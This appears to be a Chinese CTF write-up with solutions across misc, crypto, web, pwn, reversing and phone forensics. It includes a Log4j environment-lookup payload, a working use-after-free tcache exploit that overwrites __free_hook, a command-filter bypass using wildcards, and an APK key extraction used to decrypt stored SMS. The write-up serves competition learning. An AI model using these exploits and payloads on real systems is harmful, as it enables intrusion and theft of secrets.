参考队友的wp,负责取证,一小时不到梭完了开始坐牢,取证题目也真抽象,屑

misc

排队队吃果果

无色字体先给颜色

image-20230916175437075

根据题目名很显然要排序,先把文本类型都转成数字

image-20230916175518143

然后根据题目名,应该是要排序的,观察发现总共是39*39的数据,显然是个二维码

根据是否加粗应该是要转01,又观察发现第一列和最后一列数据都是没有加粗的,应该是按列进行排序

写脚本更费时,直接手动排,得到:

image-20230916175700847

很有二维码的形状了

然后小溜一下chatgpt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import openpyxl

# 打开Excel文件
workbook = openpyxl.load_workbook('your_excel_file.xlsx')

# 选择要操作的工作表
worksheet = workbook.active  # 或者通过工作表名称选择:workbook['Sheet1']

# 遍历工作表中的每个单元格
for row in worksheet.iter_rows():
    for cell in row:
        # 检查单元格是否加粗
        if cell.font.bold:
            # 如果加粗,将单元格的值设置为1
            cell.value = 1
        else:
            # 如果未加粗,将单元格的值设置为0
            cell.value = 0

# 保存修改后的Excel文件
workbook.save('modified_excel_file.xlsx')

# 关闭Excel文件
workbook.close()

可以得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
000000000000000000000000000000000000000
011111110001010101010001100101010101110
010000010011110111100000110111010101100
010111010110100011110000100011010010100
010111010110111111101101010000111111010
010111010010001010010111001111111101000
010000010001001011000111001001000101100
011111110001010011011101010001010110110
000000000010001010111010011011000100010
010111011010110101110011111101111100010
000110000111111101111111111111100101110
010110011101010101110000111110010001100
001110101001000101001010011001111010000
010101111110010101100011001010110101010
011010001011111110010001100001011000000
011000111100100000101111010101010111100
001110100110100111110011111010111010000
011101110000011110010001010011101101100
001111100100010001111000101101100011110
010101110111111011100111010111000101100
000001100011000001000101001110100000000
001000010011011101101011100000011110100
001011101001010110111011111100100110110
010010011110111110010011111101000111100
011000000001011000111101001110010011010
001110111010110000011010010100010000000
010111100000000101100111010000010110100
011001010010000000110000100000101101000
011101001001011111011001010001010101100
000110010010011100001010001011110110000
000000000110101000101000001001000000000
011111110101010101010101010101011111110
010000010001000111110111000100010000010
010111010100110100111000111010010111010
010111010111000000110101001010010111010
010111010001010010011011100100010111010
010000010000111101111111011100010000010
011111110001000011111111111111011111110
000000000000000000000000000000000000000

转二维码再扫描

image-20230916175859441

Crypto

ezrsa

原题没啥可说的,方程数据都没改

AiDai|CryptoCTF2019-Writeup (aidaip.github.io)

直接抄抄拿到pq,改个c和e直接出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import libnum
from Crypto.Util.number import long_to_bytes
p = 12604273285023995463340817959574344558787108098986028639834181397979984443923512555395852711753996829630650627741178073792454428457548575860120924352450409
q= 12774247264858490260286489817359549241755117653791190036750069541210299769639605520977166141575653832360695781409025914510310324035255606840902393222949771
n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
c = 15380535750650959213679345560658190067564859611922563753882617419201718847747207949211621591882732604480600745000879508274349808435529637573773711729853565120321608048340424321537282281161623712479117497156437792084977778826238039385697230676340978078264209760724043776058017336241110097549146883806481148999

e = 0x10001
 
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)
string = long_to_bytes(m)
print(string)
# flag{2a5a9c6fe94da5ef7edeffebb506b29a}

web

MyLinuxBot

还是原题

Write-Up: Web - Log4j & Log4j2 from Google CTF 2022 | SIGFLAG

变量名简单做了混淆而已

payload${java:${env:FLAG}}直接打

image-20230916214506775

pwn

uaf

如题目描述,存在uaf漏洞。利用uaf漏洞打tcache bin attack。

image-20230916215754512

直接附上exp。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "main"
remote_libc = "./libc-2.31.so"
ip_port = "120.78.172.238:42687"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
	# pass
	sla(">> \n",str(choice))
def add(size,content):
	cmd(1)
	sla("Tell me the book content size: \n",str(size))
	sa("Tell me the book content: \n",content)
def delete(index):
	cmd(2)
	sla("Tell me the book index: \n",str(index))
def change(index,content):
	cmd(3)
	sla("Tell me the book index: \n",str(index))
	sla("Tell me the book content: \n",content)

def show():
	cmd(4)
def login(password = b"1234567890"):
	cmd(5)
	sa("Passwd: \n",password)

def hack(name,ptr,address,mode = 2):
	sla("Tell me ur name: \n",name) #8 bytes #$p$19$p
	sla(">> \n",mode)
	sa("READ MODE: \n",ptr)
	s(address)
debug(p,'no-tmux','pie',0x1386,0x1429)
add(0x500,b"A")
add(0x500,b"b")
delete(0)
show()
main_arena = recv_libc()
libc_base = main_arena - 96 - 0x10 - libc.sym.__malloc_hook
libc.address = libc_base
free_hook = libc.sym.__free_hook
add(0x10,b"aaaaaaaaaaaaaaaa") #2
show()
ru("aaaaaaaaaaaaaaaa")
heap1 = u64(r(6).ljust(8,b"\x00"))
log_addr("heap1")
heap_base = heap1 - 0x290
add(0x10,b"A" * 0x10) #3

delete(3)
delete(0)
pause()
change(2,flat([p64(free_hook),p64(heap_base + 0x10)]))
pause()
add(0x10,b"b")
add(0x10,b'c') #5
change(5,flat([p64(libc_base + search_og(1))]))

delete(0)
itr()

image-20230916220700949

admin

此处仅讲正向思路:反编译获得题目菜单选项,首先查看第五个选项cmd。

image-20230916220014286

查看cmd选项逻辑,最多可以输入0x100字节的command存储在数组buf中。程序会对buf数组中的字符进行每两个检查sh、每四个检查flag,如果没有这两个字符存在,就执行命令。因此可以利用通配符代替flag字符获得flag。

image-20230916220123485

操作过程可以写脚本执行,直接打会更加方便。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "./main"
remote_libc = "./libc-2.31.so"
ip_port = "39.108.165.189:41548"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
	sla(">> \n",str(choice))
debug(p,'no-tmux','pie',0x1D84)

cmd(5)
command = b"cat fla*"
sla("Command: \n",command)
itr()

image-20230916220826976

re

justamat

image-20230916223242053

一开始给v0赋值 there_are_a_lot_useless_information_but_oh.o0O_

然后是输出和读入的过程

image-20230916223303130

这里v14就是输入的长度,根据长度选择流程,这里应该是大于15的

image-20230916223319608

这里进行字符串拼接,动调发现就是str1+input+str2

然后用do…while写了一个遍历,把str1+input+str2存入v5,也就是后面的v16

然后进这个函数中

image-20230916223505505

双字节提取出来

image-20230916223524696

这个do..while循环就是主要逻辑

这里直接 用z3求解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from z3 import*
s=Solver()
flag = [Int("flag%d" % i) for i in range(100)]
a = [0x0001C633, 0x0001DF94, 0x00020EBF, 0x0002BA40, 0x0001E884, 0x000260D1, 0x0001F9B1, 0x0001EA1A, 0x0001EEAA, 0x0001DFB2, 0x0001C1D0, 0x0001EEF2, 0x000216E1, 0x0002BE00, 0x0001FB5E, 0x00025D74, 0x0001F000, 0x000202D6, 0x00020002, 0x0001DDFE, 0x0001C017, 0x0001F08C, 0x000227F6, 0x0002C7BA, 0x000201AE, 0x00027FBF, 0x00020E21, 0x0001FF5C, 0x0001FD62, 0x0001E948, 0x0001BE6E, 0x0001F4D7, 0x00022C8D, 0x0002C353, 0x0001F8DB, 0x00026E1D, 0x0001FF61, 0x0001EA0F, 0x0001F0D6, 0x0001EDA8, 0x0001AD7D, 0x00018218, 0x0001CCD4, 0x000239B6, 0x0001AC4C, 0x00020D7C, 0x0001D967, 0x0001A4F4, 0x0001CAD8, 0x000196AE, 0x0001831B, 0x00017E45, 0x0001D0CF, 0x00023EDF, 0x000181AE, 0x00021760, 0x0001D3B4, 0x000175D6, 0x00017D3A, 0x0001994F, 0x0001189D, 0x00014CCF, 0x0001568E, 0x00017EEB, 0x0001327E, 0x00016A45, 0x00012921, 0x00011FF0, 0x00013643, 0x00011729, 0x00015191, 0x00017D17, 0x00017262, 0x0001A863, 0x00017010, 0x00017B10, 0x00014F9C, 0x000143E8, 0x00015E9B, 0x0001242C, 0x0000F68C, 0x0001192A, 0x000150AD, 0x0001B1A0, 0x00014C60, 0x000182AB, 0x00013F4B, 0x000141A6, 0x00015AA3, 0x000135C9, 0x0001D86F, 0x0001E8FA, 0x0002158D, 0x0002BDAC, 0x00020E4F, 0x00027EE6, 0x000213B9, 0x00020E86, 0x000211FF, 0x0001E1EF]
b = [0x000000FE, 0x0000000B, 0x0000001D, 0x000000F6, 0x00000083, 0x000000FF, 0x000000E0, 0x000000B8, 0x000000DD, 0x000000B0, 0x000000C5, 0x000000DE, 0x000000F6, 0x00000014, 0x0000009F, 0x000000DD, 0x000000D9, 0x00000007, 0x0000002D, 0x0000006B, 0x00000019, 0x000000CA, 0x00000073, 0x000000FD, 0x00000087, 0x00000072, 0x00000024, 0x00000004, 0x00000049, 0x0000007E, 0x000000A9, 0x000000CE, 0x00000091, 0x000000BE, 0x00000041, 0x00000018, 0x00000060, 0x0000003F, 0x0000002B, 0x00000063, 0x0000001C, 0x000000D2, 0x00000090, 0x000000E9, 0x0000008E, 0x000000BA, 0x0000001E, 0x000000F3, 0x00000041, 0x000000AD, 0x0000002C, 0x00000003, 0x00000069, 0x000000DA, 0x00000010, 0x000000FD, 0x000000FD, 0x000000E7, 0x00000006, 0x00000036, 0x000000D6, 0x00000002, 0x00000059, 0x00000018, 0x000000CC, 0x00000050, 0x00000087, 0x000000AF, 0x000000FB, 0x00000018, 0x00000044, 0x0000007F, 0x000000AD, 0x000000F8, 0x0000002C, 0x00000067, 0x0000001D, 0x00000022, 0x00000084, 0x000000AC, 0x0000000E, 0x00000023, 0x000000DC, 0x000000E6, 0x000000BB, 0x000000D2, 0x000000B8, 0x0000004A, 0x000000BC, 0x000000DE, 0x00000050, 0x0000009C, 0x0000001C, 0x0000001E, 0x00000086, 0x0000003A, 0x0000002D, 0x000000DD, 0x000000C3, 0x00000003]

print(len(a))
for j in range(10):
    for k in range(10):
        i = k
        v8 = 0
        for m in range(10):
            v9 = flag[j*10+m] * b[i+m*10]
            #i += 10
            v8 += v9
        s.add(v8==a[k+j*10])

if s.check() == sat:
    m = s.model()
    for f in flag:
        print(chr(m[f].as_long()),end='')

取证

1.检材数据开始提取是今年什么时候?(答案格式:04-12 13:26)

09-11 17:21

image-20230916182033999

2.嫌疑人手机SD卡存储空间一共多少GB?(答案格式: 22.5)

24.3 正确答案应该是24.32 GB

只能说出题人纯**抽象,照着答案格式保留一位小数反而错了

image-20230916182413548

3.嫌疑人手机设备名称是?(答案格式:adfer)

sailfish

image-20230916182559887

4.嫌疑人手机IMEI是?(答案格式:3843487568726387)

352531082716257

image-20230916182631030

5.嫌疑人手机通讯录数据存放在那个数据库文件中?(答案格式:call.db)

contacts.db

手翻就行

image-20230916182718423

image-20230916182806576

跟取证结果对的上

image-20230916182826573

6.嫌疑人手机一共使用过多少个应用?(答案格式:22)

99 正确答案(但不是我认为的正确答案)应该是 206

只能说又一个抽象题目

应用列表206个,官方好像就把这个当成正确答案了

image-20230916222124808

但是发现很多软件是没有最后使用时间的,安装了就根本没使用

image-20230916182946226

我的思路是导出到excel,筛选掉空行,找到有使用过的软件,同时发现部分日志软件是重复的,把重复的软件给删掉,得到99,不贴过程图了没意思

7.测试apk的包名是?(答案格式:con.tencent.com)

com.example.myapplication

apk名一眼测试软件

image-20230916183251264

扔模拟器打开,qax2023,一眼丁真,雷电解出包名

image-20230916183320152

8.测试apk的签名算法是?(答案格式:AES250)

SHA256 正确答案SHA256withRSA

不说了,又是纯抽象题目

image-20230916221919909

9.测试apk的主入口是?(答案格式:com.tmp.mainactivity)

com.example.myapplication.MainActivity

image-20230916183541654

image-20230916183616771

10.测试apk一共申请了几个权限?(答案格式:7)

3

这题一开始犹豫挺久的,不知道2还是3

能搜到这个额外添加的也算权限,那就算吧

image-20230916183734303

11.测试apk对Calllog.txt文件内的数据进行了什么加密?(答案格式:DES)

Base64 BASE64 都错,目前不知道正确答案,也许base64???(如果是这个出题人自己)

又一个巨jb抽象的不知道答案格式的题目

jadx直接爆搜文件名

image-20230916183933016

这不一眼base64

image-20230916184006140

12.10086对嫌疑人拨打过几次电话?(答案格式:5)

2

懒得找了,直接everything全局搜一下文件位置

image-20230916210722700

image-20230916222850644

13.测试apk对短信记录进行了几次加密?(答案格式:5)

2

电话下面就是短息的加密,显然一次AES一次base64

image-20230916211230701

14.测试apk对短信记录进行加密的秘钥是?(答案格式:slkdjlfslskdnln)

bGlqdWJkeWhmdXJp

key通过Getkey函数拿到

image-20230916211639295

跟一下,native关键词修饰,函数体应该在so文件里

image-20230916211753857

apk改后缀zip解压,逆一下so文件

函数入口可以直接搜getkey或者搜java

image-20230916212528277

第一部分

image-20230916213004046

first跟进找到一串字符lijubdyhfurindhcbxdw

image-20230916212949273

后面一眼base64

image-20230916213040239

编码表反向验证

image-20230916212804869

因此key应该就是把字符串base64编码后的结果,根据aes key的性质应该取前16位

bGlqdWJkeWhmdXJp

解密成功

image-20230916213431886

15.嫌疑人在2021年登录支付宝的验证码是?(答案格式:3464)

9250

由上图解密结果得9250